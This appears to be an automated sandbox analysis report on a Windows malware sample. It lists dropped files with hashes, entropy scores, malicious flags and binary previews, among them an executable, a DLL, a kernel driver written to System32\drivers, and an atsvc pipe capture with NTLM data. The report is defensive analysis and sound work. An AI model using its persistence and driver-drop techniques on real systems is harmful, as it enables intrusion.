                                                                                      Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):8299
                                                                                      Entropy (8bit):7.9354275320361545
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                                                      MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                                                      SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                                                      SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                                                      SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\FOM-52[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):5062442
                                                                                      Entropy (8bit):7.999518892518095
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:GIusCrIENkeXPV97kqmCf4P48E37aREUXr7VYyUOhez2IlpmURniNmJ:Xngv7NmCAPLTREQVb8/RomJ
                                                                                      MD5:70C21DA900796B279A09040B00953E40
                                                                                      SHA1:7CD3690B1FDDE033CD47E657FC4FC3A423DF716F
                                                                                      SHA-256:901330243EF0F7F0AAE4F610693DA751873E5B632E5F39B98E3DB64859D78CBC
                                                                                      SHA-512:851F4ED843F5D47C93D6C5A7D1895A674B6448631B567A0CCB2DF5873E4A5E722F28ECFC4D0D3220A86309481F9793FCDDA4F89BD993FB79CD09DBED29423752
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):10681
                                                                                      Entropy (8bit):7.866148090449211
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                                                      MD5:10A818386411EE834D99AE6B7B68BE71
                                                                                      SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                                                      SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                                                      SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\drops[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):37274
                                                                                      Entropy (8bit):7.991781062764932
                                                                                      Encrypted:true
                                                                                      SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                                                      MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                                                      SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                                                      SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                                                      SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\FOM-50[1].jpg

                                                                                      Download File
                                                                                      Process:C:\Users\user\Documents\BEqRkb.exe
                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):55085
                                                                                      Entropy (8bit):7.99273647746538
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                                                      MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                                                      SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                                                      SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                                                      SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                                                      Malicious:false
                                                                                      Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):135589
                                                                                      Entropy (8bit):7.995304392539578
                                                                                      Encrypted:true
                                                                                      SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                                                      MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                                                      SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                                                      SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                                                      SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):28272
                                                                                      Entropy (8bit):7.711669286063167
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:9NegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQ3:25F1FUdy422IK+gAZt2i0YPpQn4GMs
                                                                                      MD5:6F93B0260C6726714C31FF7CCA6EDFCB
                                                                                      SHA1:28667AAF69F4DA80A6C75C248B8B3A2A622B97A4
                                                                                      SHA-256:F6F4804152CDCFBE067BE76171DFFC93D1EBCC230A9E55800939109E82887692
                                                                                      SHA-512:4642EC34EA6561945772E070F01C0F09DC164FB8789C556299D4C280643D91B70C1D36C3595CEB4181389641F6C4BCD7E564B6DD52899EED4AD0C71E64B7B376
                                                                                      Malicious:false
                                                                                      Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb.$cbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC

                                                                                      C:\Users\user\Documents\BEqRkb.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):133136
                                                                                      Entropy (8bit):6.350273548571922
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:NtmH5WKiSogv0HSCcTwk7ZaxbXq+d1ftrt+armpQowbFqD:NYZEHG0yfTPFas+dZZrL9MD
                                                                                      MD5:D3709B25AFD8AC9B63CBD4E1E1D962B9
                                                                                      SHA1:6281A108C7077B198241159C632749EEC5E0ECA8
                                                                                      SHA-256:D2537DC4944653EFCD48DE73961034CFD64FB7C8E1BA631A88BBA62CCCC11948
                                                                                      SHA-512:625F46D37BCA0F2505F46D64E7706C27D6448B213FE8D675AD6DF1D994A87E9CEECD7FB0DEFF35FDDD87805074E3920444700F70B943FAB819770D66D9E6B7AB
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.E.7w+.7w+.7w+...V.?w+...E..w+...F.Qw+...P.5w+.>...>w+.7w*..w+...Y.>w+...W.6w+...S.6w+.Rich7w+.........PE..d...Kd.]..........#......*..........P].........@............................................................................................,...x...............,........H...........D...............................................@..@............................text...*).......*.................. ..`.rdata..x_...@...`..................@..@.data....:..........................@....pdata..,...........................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\Documents\MsMpList.dat

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):3889557
                                                                                      Entropy (8bit):7.999938750616535
                                                                                      Encrypted:true
                                                                                      SSDEEP:98304:mAnkiLOZS/hpXbdHpPcG59BO8NQXIeXXv5L4f2fN3yQWF+A:lndLOZS/DtpPJRO8OHBL4f2UQI+A
                                                                                      MD5:091AE0DC1B3C2531739B11CD233B5A44
                                                                                      SHA1:95642EABEB2C48665CB90AB8F64B2C5B855B3A01
                                                                                      SHA-256:2E6D1657C9908BDD49DDA56401D3E3EA640C75F8C0D95386A3A45D1016975F8A
                                                                                      SHA-512:8919D2BF08646CFE9DDFB16EA43D4A933A3298481519B586B33388380EDF94184215B80CBA40F2C044C5FA0F2CF58D305314ED2D98CB976D186AF6E9F02A6947
                                                                                      Malicious:false
                                                                                      Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q9.K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

                                                                                      C:\Users\user\Documents\WordpadFilter.db

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:GIF image data, version 89a, 10 x 10
                                                                                      Category:dropped
                                                                                      Size (bytes):8228
                                                                                      Entropy (8bit):7.978940772538323
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:lBue6hKvTlByz2GqpoPTgyXrByFCt4lXp9tyey2Q0l:lBuNhyTlBU2dp+1XrBuCgp9vU0l
                                                                                      MD5:CF73114D7857EBFE7A05714F1DCCEC20
                                                                                      SHA1:C5073CEA4368AB42C44A6E58CA260189A76B9B96
                                                                                      SHA-256:EA1E0E354F16590DF28D6F419202CD351A585AB6A3F6586DB4A960883DFD5BD7
                                                                                      SHA-512:DBA44B745ACFEC70BFF8F59E09A5E8DE86F7E1295EA7D7C20CA0EDBDA1BC518C755EB9F925633549DB8A0CA061EB9415B34317E1C042EC3C928BC8F15D07C555
                                                                                      Malicious:false
                                                                                      Preview:GIF89a.......,...........;.;G_fx5.#DV..g..}A/...l=.2......'o...!.....e.,t..o8.^...B^x..6I*X.DC.Oa..../_...n$_.y..+jb..r...Y4/Rv.....(;....$...g..........~.IN ...-<R7....eZ..q4.....~...}....~t<......|}....x.)U3.`U..s....W..WY..w+o-[..{..l..i`.:.......L'.>...$. .a.x.2#y_(9....d,....=n...%..*.c.........dq.nfLI....!1..2...`.,...~....)w.5E 1.V...0."...cu...p........^|@.-w..+...M.(.GK.y}.N.........}.....-..e.......X...GE.|.-._..*.M.....Mc........9/..fQ.Z.....W.....s...........k?C.q.u.-...Q..."..kt..A..128.......7#...~....1.`..:C.(.C.<y.(..<..'..+.!&.....r..I.....d...W.....-.'.Ec`Nv.8).....!....?.....\..N.3..D...U.....(..#sdY..D"...p.>.W.Q...}.. ..2.A('Q\_y...|..Az..JO.B.A..Q05.)..Q..zd..V..l......S.....dS.x....z^..z...).a.....4.G..........M.,..a..U...\....G...$...Q.7...@.x...x.s..R..0.-3...).x.D..f.I..n.....}..{.p.q.%,.lF.f.Up..UM..Y..1............R.....F.._....Y..u...e^.c...f.'..U.W1g..e#J...Z.W.....w.[...........R.?.m......"@.f..V..fxI

                                                                                      C:\Users\user\Documents\vselog.dll

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):122880
                                                                                      Entropy (8bit):6.0020589774565
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:Jd4E7qItA4nbQ0R3rh4Q8/0fp0uQ4S8S7YDLbnTPtrTzvesW7dj9dl4Cp52Fc:Jf7qG3Gyp0p4ZmGLbTPJT7y7aCp5gc
                                                                                      MD5:DC0E46A0906F983FE8723422A73AAB7F
                                                                                      SHA1:46799268AE5A00C274DB38EFE89E45469092FE74
                                                                                      SHA-256:3F8F93C47189F5D2F98B152B8BD1E5E33DA66068DB80136656FA4E27803EC75B
                                                                                      SHA-512:D3A6193AE351F506C22B50FD633C4681434DC5BDF94C2012EE0D85E689FED11C156362FE5171FFC26168CB3E746878E13F60FF39E0B360D369FBC2D2E2C55BB5
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d... .E .E .Ek..D%.Ek..D..Ek..D*.E0N.D).E0N.D..E0N.D..Ek..D#.E .EB.EhO.D!.EhO.D!.EhOHE!.E . E!.EhO.D!.ERich .E........PE..d....w.g.........." ...).....................................................0............`.........................................`...........(.......H.................... ..x... ...8...............................@............ ...............................text............................... ..`.rdata....... ......................@..@.data...0...........................@....pdata..............................@..@.rsrc...H...........................@..@.reloc..x.... ......................@..B........................................................................................................................................................................................................................................

                                                                                      C:\Windows\System32\drivers\189atohci.sys

                                                                                      Download File
                                                                                      Process:C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):28272
                                                                                      Entropy (8bit):6.229103477454524
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:l3YUY30d1Kgf4AtcTmwZ/22a97C5ohYh3IB96Oys2+l0skiM0HMFrba8no0ceD/o:lOUkgfdZ9pRyv+uPzCMHo3q4tDghq
                                                                                      MD5:96517BC2F77445C5B3967463CC4F033B
                                                                                      SHA1:8A68AC27D02A77AB70FE151E7B679061199F200A
                                                                                      SHA-256:79B65F8C7C55A3827E3889ADC67B048028AFC8698C73186A8F4D9729B48E9AC3
                                                                                      SHA-512:EB0F5E78D33D097350F8F831CDA98DB12B596064D326C536BB850FDF1843896E11F0E5022882FBB27945E4D04DD2EF0002324D90AB6B6547BC0C4D1CB29892D3
                                                                                      Malicious:true
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ri...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:...:Rich...:........................PE..d....S.V.........."......:..........l................................................F..........................................................(............`.......P..p.......D....A...............................................@...............................text....,.......................... ..h.rdata.......@.......2..............@..H.data........P.......:..............@....pdata.......`.......<..............@..HPAGE....l....p.......>.............. ..`INIT.................@.............. ....rsrc................J..............@..B.reloc...............N..............@..B........................................................................................................................................................................................

                                                                                      C:\xxxx.ini

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:y:y
                                                                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                      Malicious:false
                                                                                      Preview:..

                                                                                      \Device\Mup\localhost\pipe\atsvc

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\2dHqG0\2dHqG0.exe
                                                                                      File Type:GLS_BINARY_LSB_FIRST
                                                                                      Category:dropped
                                                                                      Size (bytes):297
                                                                                      Entropy (8bit):4.446290037999133
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:ri9K0/ldl//lll1siQg4d1ywsiQI5kZt8jtl/zi8tkHsl8/lP92lU8IAuUWKznlD:ri9TDTwPYtyjtOsNaG4oi8F
                                                                                      MD5:F6C212BA2542DE05E741DF0826EDA8E0
                                                                                      SHA1:6D3B9BC5483F20D04BE977E3BEA1A3D7DEB0A3F1
                                                                                      SHA-256:4E96BA06444457C054374825BA2C630F2EB5367575750FD2280BD00D7597BE7E
                                                                                      SHA-512:EFA1195B6DA21935157BDBCFC6AE1DC4C3FA49655A8B4A4BD703612B3B60F381B400C6E201A859F479FE7A60303DD0DF1A54A1236E83C65995F8467C2D979B77
                                                                                      Malicious:false
                                                                                      Preview:..........9.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............0.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ........2...`......

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                      Entropy (8bit):0.11672737241969741
                                                                                      TrID:
                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:2o63254452-763487230.06.exe
                                                                                      File size:30'965'248 bytes
                                                                                      MD5:0c3951cfe848ead37f11600ee5195006
                                                                                      SHA1:1f8a4240b5775c7d7c91c0bb48cf2a52df246f5c
                                                                                      SHA256:b0f951ad23e146280e4cdda33f3eb97c99baede4e8429c4366d84971bf8aaeaa
                                                                                      SHA512:7a8f9c8d1330d9746fa26b0bc194a500d3f73df032a829677d667001955fccfc8c7fdaafaf0fcfa06e5edf858d6b86c2399000a4a4b073419c214c2072ea1911
                                                                                      SSDEEP:3072:EoUOpGkDuFdnFYGKLOiLS2iOJJC2jLEfTRoalXzeQGxGVriCW5to3GYVfJ0TFE+/:WT+viOW2nEfTll85twYhE+9hs0
                                                                                      TLSH:A6677B6AB6D050F5D1768174C841A62AF3B27C39072457FF43A4322ADE736E89E3EB50
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........m...>...>...>...?...>...?...>...?...>...?...>...?...>...?...>...?...>...>...>)..?...>).W>...>)..?...>Rich...>........PE..d..

                                                                                      File Icon

                                                                                      Icon Hash:30f0f0b2b2d2f090

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x14000751c
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x66A6DF58 [Mon Jul 29 00:16:24 2024 UTC]
                                                                                      TLS Callbacks:
